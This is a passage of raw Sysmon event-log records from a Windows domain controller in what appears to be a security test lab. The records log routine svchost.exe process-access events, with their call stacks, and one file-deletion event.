12:02:18.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.659{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.644{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-64C6-6064-A900-00000000AE01}34044568C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005668Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005667Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005666Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.628{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\